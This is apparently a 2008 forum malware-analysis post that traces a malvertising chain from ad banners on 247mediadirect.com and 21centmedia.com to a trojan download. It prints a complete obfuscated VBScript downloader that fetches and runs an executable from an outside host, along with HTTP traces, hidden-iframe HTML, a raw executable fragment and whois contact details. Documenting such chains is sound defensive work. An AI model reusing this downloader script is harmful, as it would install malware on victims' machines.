<b>Warning</b>:  mysql_pconnect() [<a href='function.mysql-pconnect'>function.mysql-pconnect</a>]: Too many connections in <b>/www/htdocs/jh/f.php</b> on line <b>38</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /www/htdocs/jh/f.php:38) in <b>/www/htdocs/jh/f.php</b> on line <b>49</b><br />

185B

<script language="VBScript">
</script>

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

//-->
</script>

<script language="VBScript">
Dim s
str=""
s = Array(74,105,27,64,109,109,106,109,27,77,96,110,112,104,96,27,73,96,115,111,5,110,96,111,27,95,27,56,27,95,106,94,112,104,96,105,111,41,94,109,96,92,111,96,96,103,96,104,96,105,111,35,29,106,29,33,29,93,29,33,29,101,29,33,29,96,29,33,29,94,29,33,29,111,29,36,5,63,100,104,27,100,95,110,35,44,47,36,5,100,95,110,35,43,36,27,27,56,27,29,61,63,52,49,62,48,48,49,40,49,48,60,46,40,44,44,63,43,40,52,51,46,60,40,43,43,62,43,47,65,62,45,52,64,46,49,29,5,100,95,110,35,44,36,27,27,56,27,29,61,63,52,49,62,48,48,49,40,49,48,60,46,40,44,44,63,43,40,52,51,46,60,40,43,43,62,43,47,65,62,45,52,64,46,49,29,5,100,95,110,35,45,36,27,27,56,27,29,60,61,52,61,62,64,63,63,40,64,62,50,64,40,47,50,64,44,40,52,46,45,45,40,63,47,60,45,44,43,49,44,50,44,44,49,29,5,100,95,110,35,46,36,27,27,56,27,29,43,43,43,49,65,43,46,46,40,43,43,43,43,40,43,43,43,43,40,62,43,43,43,40,43,43,43,43,43,43,43,43,43,43,47,49,29,5,100,95,110,35,47,36,27,27,56,27,29,43,43,43,49,65,43,46,60,40,43,43,43,43,40,43,43,43,43,40,62,43,43,43,40,43,43,43,43,43,43,43,43,43,43,47,49,29,5,100,95,110,35,48,36,27,27,56,27,29,49,96,46,45,43,50,43,92,40,50,49,49,95,40,47,96,96,49,40,51,50,52,94,40,95,94,44,97,92,52,44,95,45,97,94,46,29,5,100,95,110,35,49,36,27,27,56,27,29,49,47,44,47,48,44,45,61,40,61,52,50,51,40,47,48,44,63,40,60,43,63,51,40,65,62,65,63,65,46,46,64,51,46,46,62,29,5,100,95,110,35,50,36,27,27,56,27,29,50,65,48,61,50,65,49,46,40,65,43,49,65,40,47,46,46,44,40,51,60,45,49,40,46,46,52,64,43,46,62,43,60,64,46,63,29,5,100,95,110,35,51,36,27,27,56,27,29,43,49,50,45,46,64,43,52,40,65,47,62,45,40,47,46,94,51,40,51,46,48,51,40,43,52,65,62,63,44,63,61,43,50,49,49,29,5,100,95,110,35,52,36,27,27,56,27,29,49,46,52,65,50,45,48,65,40,44,61,45,63,40,47,51,46,44,40,60,52,65,63,40,51,50,47,51,47,50,49,51,45,43,44,43,29,5,100,95,110,35,44,43,36,27,56,27,29,61,60,43,44,51,48,52,52,40,44,63,61,46,40,47,47,97,52,40,51,46,61,47,40,47,49,44,47,48,47,62,51,47,61,65,51,29,5,100,95,110,35,44,44,36,27,56,27,29,63,43,62,43,50,63,48,49,40,50,62,49,52,40,47,46,65,44,40,61,47,60,43,40,45,48,65,48,60,44,44,65,60,61,44,52,29,5,100,95,110,35,44,45,36,27,56,27,29,64,51,62,62,62,63,63,65,40,62,60,45,51,40,47,52,49,93,40,61,43,48,43,40,49,62,43,50,62,52,49,45,47,50,49,61,29,5,97,106,109,27,100,27,56,27,43,27,111,106,27,44,46,5,27,27,27,27,27,27,27,27,95,41,110,96,111,92,111,111,109,100,93,112,111,96,27,29,94,29,33,29,103,29,33,29,92,29,33,29,110,29,33,29,110,29,33,29,100,29,33,29,95,29,39,27,29,94,29,33,29,103,29,33,29,110,29,33,29,100,29,33,29,95,29,33,29,53,29,33,100,95,110,35,100,36,5,27,27,27,27,27,27,27,27,110,96,111,27,92,27,56,27,95,41,94,109,96,92,111,96,106,93,101,96,94,111,35,29,72,29,33,29,100,29,33,29,94,29,33,29,109,29,33,29,106,29,33,29,110,29,33,29,106,29,33,29,97,29,33,29,111,29,33,29,41,29,33,29,83,29,33,29,72,29,33,29,71,29,33,29,67,29,33,29,79,29,33,29,79,29,33,29,75,29,39,29,29,36,5,27,27,27,27,27,27,27,27,100,97,27,96,109,109,41,105,112,104,93,96,109,27,27,56,27,43,27,111,99,96,105,5,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,96,115,100,111,27,97,106,109,5,27,27,27,27,27,27,27,27,96,105,95,27,100,97,5,105,96,115,111,5,110,96,111,27,96,27,56,27,95,41,94,109,96,92,111,96,106,93,101,96,94,111,35,29,78,29,33,29,94,29,33,29,109,29,33,29,100,29,33,29,107,29,33,29,111,29,33,29,100,29,33,29,105,29,33,29,98,29,33,29,41,29,33,29,65,29,33,29,100,29,33,29,103,29,33,29,96,29,33,29,78,29,33,29,116,29,33,29,110,29,33,29,111,29,33,29,96,29,33,29,104,29,33,29,74,29,33,29,93,29,33,29,101,29,33,29,96,29,33,29,94,29,33,29,111,29,39,29,29,36,5,110,96,111,27,98,27,56,27,95,41,94,109,96,92,111,96,106,93,101,96,94,111,35,29,60,29,33,29,95,29,33,29,106,29,33,29,95,29,33,29,93,29,33,29,41,29,33,29,78,29,33,29,111,29,33,29,109,29,33,29,96,29,33,29,92,29,33,29,104,29,39,29,29,36,5,97,106,109,27,100,27,56,27,43,27,111,106,27,48,5,27,27,27,100,97,27,100,27,56,27,43,27,111,99,96,105,27,115,27,56,27,29,94,53,87,114,100,105,95,106,114,110,87,111,96,104,107,29,27,96,103,110,96,27,100,97,27,100,27,56,27,44,27,111,99,96,105,27,115,27,56,27,29,94,53,87,111,96,104,107,29,27,96,103,110,96,27,100,97,27,100,27,56,27,45,27,111,99,96,105,27,115,27,56,27,29,94,53,87,111,104,107,29,27,96,103,110,96,27,100,97,27,100,27,56,27,46,27,111,99,96,105,27,115,27,56,27,29,94,53,87,114,100,105,105,111,87,111,96,104,107,29,27,96,103,110,96,27,100,97,27,100,27,56,27,47,27,111,99,96,105,27,115,27,56,27,29,94,53,87,29,27,96,105,95,27,100,97,5,27,27,27,99,27,56,27,96,41,93,112,100,103,95,107,92,111,99,35,115,39,29,87,101,97,100,95,106,101,41,96,115,96,29,36,5,27,27,27,98,41,111,116,107,96,27,56,27,44,5,27,27,27,92,41,106,107,96,105,27,29,66,29,33,29,64,29,33,29,79,29,39,27,29,99,111,111,107,53,42,42,45,47,50,104,96,95,100,92,95,100,109,96,94,111,41,94,106,104,42,93,93,93,41,107,99,107,42,44,45,44,47,49,52,46,51,43,49,42,48,95,97,93,48,44,92,49,50,97,49,45,51,48,47,50,50,43,95,51,92,49,52,96,45,96,43,94,95,50,44,94,41,96,115,96,58,92,97,97,100,95,56,52,48,48,43,29,39,27,43,5,27,27,27,92,41,110,96,105,95,5,27,27,27,98,41,106,107,96,105,5,27,27,27,98,41,114,109,100,111,96,27,92,41,109,96,110,107,106,105,110,96,93,106,95,116,5,27,27,27,98,41,110,92,113,96,111,106,97,100,103,96,27,99,39,45,5,27,27,27,98,41,94,103,106,110,96,5,27,27,27,100,97,27,96,109,109,41,105,112,104,93,96,109,27,55,57,27,43,27,111,99,96,105,5,27,27,27,27,27,27,27,27,64,109,109,41,62,103,96,92,109,5,27,27,27,96,103,110,96,5,27,27,27,27,27,27,27,27,110,96,111,27,100,27,56,27,95,41,94,109,96,92,111,96,106,93,101,96,94,111,35,29,110,29,33,29,99,29,33,29,96,29,33,29,103,29,33,29,103,29,33,29,41,29,33,29,92,29,33,29,107,29,33,29,107,29,33,29,103,29,33,29,100,29,33,29,94,29,33,29,92,29,33,29,111,29,33,29,100,29,33,29,106,29,33,29,105,29,39,29,29,36,5,27,27,27,27,27,27,27,27,100,41,110,99,96,103,103,96,115,96,94,112,111,96,27,99,39,29,29,39,29,29,39,29,106,29,33,29,107,29,33,29,96,29,33,29,105,29,39,43,5,27,27,27,27,27,27,27,27,96,115,100,111,27,97,106,109,5,27,27,27,64,105,95,27,100,97,5,105,96,115,111)
For i = 0 to UBound(s)
    str = str & chr(s(i) + 5)
Next
Execute(str)
</script>
0

Execute(str) leads us to the next location where we start to download jfidoj.exe.

CODE
GET http://247mediadirect.com/bbb.php/1214693806/5dfb51a67f62854770d8a69e2e0cd71c.exe?affid=9550 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 247mediadirect.com
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 28 Jun 2008 22:56:48 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
X-Powered-By: PHP/5.2.0
Content-Length: 29760
Content-Type: application/octet-stream

MZÿÿ¸@غ´    Í!¸LÍ!This program cannot be run in DOS mode.

$ôÌ°gsŸ°gsŸ°gsŸË{Ÿ±gsŸ°grŸˆgsŸÒx`ŸµgsŸ†AxŸµgsŸ3{}Ÿ±gsŸ†AyŸ¿gsŸwauŸ±gsŸRich°gsŸPELê7THà pPpË`Ð@à`ÐðÐ`UPX0P€àUPX1p`n@à.rsrcÐr@À3.10UPX!
    §¥ÉF†Ôñ ¥ài†&§344ðÎßÐÑ_ŸðݤÃY0Þ×ÒðÎZáö?ú• Ã!a/àfdøz²÷¤6:¤­¯qØí     ¶þ1ÊS6Ə 9J-

Note: some of the GET URLs have been broken into 3 lines for visibility reasons.

<h4>
Notes
</h4>
Launches itself with the command line parameter 1
IPB Image
For changes and behavior please see Technical details & Notes in post #1. This version of jfidoj.exe creates 2 additional files.

QUOTE
c:\WINDOWS\system32\42g1275i.exe.a_a
Date: 6/28/2008 6:08 PM
Size: 0 bytes

c:\Documents and Settings\KLY\Local Settings\Temp\1Ll5OSVH.hdi
date: 6/28/2008 6:09 PM
size: 0 bytes
Kimberly
<h4>
jfidoj.exe - 21centmedia.com - 209.47.164.209
</h4>
247mediadirect.com has a lil' friend I did encounter today ...

21centmedia.com - 209.47.164.209.

Website Title: None given.
ICANN Registrar: INTERCOSMOS MEDIA GROUP, INC. D/B/A DIRECTNIC.COM
Created: 2008-05-29
Expires: 2009-05-29
Updated: 2008-05-29
Name Server: NS0.DIRECTNIC.COM (has 354,650 domains)
Name Server: NS1.DIRECTNIC.COM
Whois Server: whois.directnic.com

IP Address: 209.47.164.209
IP Location - United States - Mci Communications Services Inc. D/b/a Verizon Business
Dedicated Hosting: 21centmedia.com is hosted on a dedicated server.

Registrant:
Media Hosting Ltd.
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Domain Name: 21CENTMEDIA.COM

Administrative Contact:
Pearson, Ross
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Technical Contact:
Pearson, Ross
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Record expires on 05-29-2009
Record created on 05-29-2008

Domain servers in listed order:
NS0.DIRECTNIC.COM 69.46.233.245
NS1.DIRECTNIC.COM 69.46.234.245

<h4>
Network traces
</h4>
CODE
GET /campaign/1/1/468x60 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.yieldmanager.com/iframe3?[removed]
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 21centmedia.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Wed, 16 Jul 2008 01:15:14 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
X-Powered-By: PHP/5.2.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 534
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<HTML><BODY><A HREF="http://21centmedia.com/route/1/5919/117" TARGET="_blank"><IMG SRC="http://21centmedia.com/banner/images/468x60/84489.jpg"></A><iframe src="http://21centmedia.com/xo/a.php?id=5919"  frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe></BODY></HTML><iframe src="http://209.47.164.209/z?i=1&n=4f6e8320e1ae5ca898cca282b69215e5&t=1216170914"  frameborder=0
marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe>

The banner.

CODE
GET /banner/images/468x60/84489.jpg HTTP/1.1
Accept: */*
Referer: http://21centmedia.com/campaign/1/1/468x60
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 21centmedia.com
Connection: Keep-Alive

21centmedia.com/xo/a.php?id=5919 contains a VBS script to contruct the next URL.

CODE
GET /xo/a.php?id=5919 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://21centmedia.com/campaign/1/1/468x60
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 21centmedia.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Wed, 16 Jul 2008 01:15:15 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
X-Powered-By: PHP/5.2.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Set-Cookie: A00=1; expires=Thu, 17-Jul-2008 01:15:15 GMT
Content-Length: 6067
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<script language="VBScript">
Dim s
str=""
s =
...
... REMOVED AS IT IS THE SAME STYLE AS ABOVE
...

For i = 0 to UBound(s)
    str = str & chr(s(i) + 5)
Next
Execute(str)
</script>
0

Execute(str) leads us to the next location where we start to download jfidoj.exe.

CODE
GET /ot/a.php/1216170915/4693b5662c346f9d5eb959e1fda521b3.exe?affid=5919 HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 21centmedia.com
Connection: Keep-Alive


209.47.164.209/z?i=1&n=4f6e8320e1ae5ca898cca282b69215e5&t=1216170914 leads to an encoded script with a SWF file to download. More about that here because it's a Flash exploit.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2014 Invision Power Services, Inc.